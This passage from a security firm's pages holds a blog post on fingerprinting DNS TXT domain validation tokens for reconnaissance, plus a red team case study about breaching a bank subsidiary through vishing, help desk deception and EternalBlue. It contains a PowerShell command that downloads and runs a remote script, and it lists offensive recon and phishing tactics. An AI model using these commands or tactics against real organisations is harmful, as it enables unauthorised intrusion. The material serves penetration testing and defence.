577 citrix.com Collaboration citrix-verification-code=ed1a7948-6f0d-4830-9014-d22f188c3bab
441 brave.com Collaboration brave-ledger-verification=fb42f0147b2264aa781f664eef7d51a1be9196011a205a2ce100dc76ab9de39f
427 Adobe Sign / Document Cloud Electronic Signing adobe-sign-verification=fe9cdca76cd809222e1acae2866ae896
384 Firebase (Google) Development and Publishing firebase=solar-virtue-511
384 O365 Cloud Services mscid=veniWolTd6miqdmIAwHTER4ZDHPBmT0mDwordEu6ABR7Dy2SH8TjniQ7e2O+Bv5+svcY7vJ+ZdSYG9aCOu8GYQ==
381 loader.io Security loaderio=fefa7eab8eb4a9235df87456251d8a48

Automating Domain Validation Token Fingerprinting

To streamline the process a little bit I’ve written a PowerShell function called “Resolve-DnsDomainValidationToken”.  You can simply provide it domains and it will scan the associated DNS TXT records for known service providers based on the library of domain validation tokens I created.  Currently it supports parameters for a single domain, a list of domains, or a list of URLs.

Resolve-DnsDomainValidationToken can be downloaded HERE.

Command Example

To give you an idea of what the commands and output look like I’ve provided an example below.  The target domain was randomly selected from the Alexa 1 Million list.

# Load Resolve-DnsDomainValidationToken into the PowerShell session
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerShell/master/Resolve-DnsDomainValidationToken.ps1")

# Run Resolve-DnsDomainValidationToken to collect and fingerprint TXT records
$Results = Resolve-DnsDomainValidationToken -Verbose -Domain adroll.com  

# View records in the console
$Results

Domain Validation Token Fingerprint

For those of you that don’t like starring at the console, the results can also be viewed using Out-GridView.

# View record in the out-grid view
$Results | Out-GridView

Domain Validation Token Fingerprint Gridview

Finally, the command also automatically creates two csv files that contain the results:

  1. Dns_Txt_Records.csv contains all TXT records found.
  2. Dns_Txt_Records_Domain_Validation_Tokens.csv contains those TXT records that could fingerprinted.

Domain Validation Token Fingerprint Csv

How can Domain Validation Tokens be used for Evil?

Below are a few examples of how we’ve used domain validation tokens during penetration tests.  I’ve also added a few options only available to real-world attackers due to legal constraints placed on penetration testers and red teams.

Penetration Testers Use Cases

  1. Services that Support Federated Authentication without MFA
    This is our most common use case. By reviewing domain validation tokens we have been able to identify service providers that support federated authentication associated with the company’s Active Directory deployment.  In many cases they aren’t configured with multi-factor authentication (MFA).  Common examples include Office 365, AWS, G Suite, and Github.

    Pro Tip: Once you’ve authenticated to Azure, you can quickly find additional service provider targets that support federated/managed authentication by parsing through the service principal names.  You can do that with Karl’s Get-AzureDomainInfo.ps1 script.

  2. Subdomain Hijacking Targets
    The domain validation tokens could reveal services that support subdomain which can be attacked once the CNAME records go stale. For information on common techniques Patrik Hudak wrote a nice overview here.
  3. Social Engineering Fuel
    Better understanding the technologies and service providers used by an organization can be useful when constructing phone and email phishing campaigns.
  4. General Measurement of Maturity
    When reviewing domain validation tokens for all of the domains owned by an organization it’s possible to get a general understanding of their level of maturity, and you can start to answer some basic questions like:

    1. Do they use Content Distribution Networks (CDNs) to distribute and protect their website content?
    2. Do they user 3rd party marketing and analytics? If so who? How are they configured?
    3. Do they use security related service providers? What coverage do those provide?
    4. Who are they using to issue their SSL/TLS certifications? How are they used?
    5. What mail protection services are they using? What are those default configurations?
  5. Analyzing domain validation tokens for a specific online service provider can yield additional insights. For example,
    1. Many domain validation tokens are unique numeric values that are simply incremented for each new customer.  By analyzing the values over thousands of domains you can start to infer things like how long a specific client has been using the service provider.
    2. Some of the validation tokens also include hashes and encrypted base64 values that could potentially be cracked offline to reveal information.
  6. Real-world attackers can also attempt to compromise service providers directly and then move laterally into a specific company’s site/data store/etc. Shared hosting providers are a common example. Penetration testers and red teams don’t get to take advantage of those types of scenarios, but if you’re a service provider you should be diligent about enforcing client isolation to help avoid opening those vectors up to attackers.

Wrap Up

Analyzing domain validation tokens found in DNS TXT records is far from a new concept, but I hope the library of fingerprints baked into Resolve-DnsDomainValidationToken will help save some time during your next red team, pentest,  or internal audit.  Good luck and hack responsibly!

Back

Leading Financial Institution Leveraged NetSPI Red Team Service to Improve Their Security Posture

The Situation

In a report published by consulting firm West Monroe Partners, 40 percent of acquiring businesses said they discovered a high-risk security problem at an acquisition after a deal went through. With this in mind, executive management at one of America’s largest banks wanted to ensure that one of their subsidiaries wasn’t suffering from similar security control gaps. In addition, the bank wanted to understand if identified security gaps could be leveraged to gain unauthorized access to the subsidiary’s networks and resources. To answer those questions, and report on the subsidiary’s responsiveness to real-life attack scenarios, the bank hired NetSPI to conduct a red team operation.

The Approach

During some red team operations, clients provide information to save time, such as employee names, reporting structures, policy details, or system targets. In this instance, the test was conducted using a black box approach, meaning no information was provided by the client. Despite this handicap, NetSPI would put the bank’s newly merged digital infrastructure to the test by attempting to achieve and maintain unauthorized network access via both technical testing methods and social engineering. The bank wanted to know if system, services, or employee identification processes were vulnerable. If so, they wanted NetSPI to exploit those vulnerabilities in order to gain access to critical resources owned by the subsidiary. They also wanted to know if any operating systems or applications were creating immediate risk and if the security controls that were deployed could be bypassed? NetSPI would find out.

The team began by conducting a significant amount of reconnaissance, learning the names of some employees and identifying their email addresses and phone numbers. Armed with this information, NetSPI initiated a targeted social engineering attack. A robo-caller was used to spoof the bank’s voice mail system, asking a targeted employee to verify their identity with their username and password. This tactic was successful in gaining an employee’s username and password. Having successfully obtained the necessary credentials, the next step was to impersonate the employee in an attempt to obtain access to the corporate Virtual Private Network (VPN).

At A Glance

Client

One of the largest U.S. financial institutions offering a comprehensive range of financial services nationwide.

Challenge

Conduct a black box red team assessment to identify weaknesses in network security, policies and procedures.

Approach

Using social engineering and technical testing methods to gain credentials, access the network and escalate privileges.

Results

Security practices and procedures have been strengthened, significantly improving the bank’s overall security posture.

  1. “Cybersecurity Due Diligence in M&A”, West Monroe Partners, July 12, 2016.

A NetSPI red team member, acting as the targeted employee, called the bank’s IT help desk and stated they were having trouble connecting to corporate network over the VPN. The help desk provided the NetSPI team member with the information below without verifying the caller’s identity beyond asking for their username, which had been obtained using the robo-caller:

  • A link where the VPN client could be downloaded.
  • Installation instructions for the VPN client
  • A one-time token that could be used for the VPN Multi-Factor Authentication (MFA) process, which was sent to a non-corporate email address controlled by the NetSPI red team member.

Now, with remote access to the target network and Active Directory domain credentials in hand, NetSPI started examining the environment for privilege escalation paths. It wasn’t long before a critical discovery was made: a Microsoft Windows server had been left unpatched, enabling the team to exploit the EternalBlue vulnerability. NetSPI then exploited this vulnerability to gain a foothold on the domain system and continue escalation towards establish targets. This foot hold was maintained for multiple days, and the MFA token used to access the network over VPN was reused multiple times. This shined some light on a gap between the bank’s policy that mandates a one-time VPN token to expire after 24 hours and the reality of the subsidiaries implementation.

After multiple days, the bank’s internal IT staff identified that there was an unauthorized user on the network and their Incident Response team was dispatched to confiscate the targeted employee’s compromised laptop. At this point, the bank personnel in the know, revealed to all necessary parties that the bank had engaged NetSPI to conduct a red team assessment. A conference call was quickly held to begin the deconfliction process to ensure that the bank had indeed discovered NetSPI’s activities and not that of an actual attacker. The bank and NetSPI were able to confirm that the red team breach had been discovered. The bank elected to end the engagement and NetSPI moved on to the reporting phase which resulted in a deliverable that contained both the overall narrative of the engagement as well as detailed writeups for all discovered vulnerabilities and weaknesses.

The Results

After the deconfliction process, internal teams worked with NetSPI to understand the attack path and technical testing leveraged throughout the engagement. The bank then took this information and built a remediation plan to address the deficiencies. For example, the off-the-shelf network detection software the bank had installed performed poorly, even though evidence of a network intrusion was captured in the log files. Because the software had not been properly tuned to the environment, alarms were not being triggered even though intrusion had been detected. This has now been remedied along with large improvements to their vulnerability management practices.

In addition, the findings of the assessment resulted in additional funding being made available to address the problem areas highlighted in the final report. A special focus was made on security awareness training for employees, adherence to employee identification and verification practices used by the help desk staff to make them more aware of malicious actors.

To verify the remediation activities were successful at the bank, NetSPI performed additional round of technical testing to verify the identified vulnerabilities were remediated.

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.

X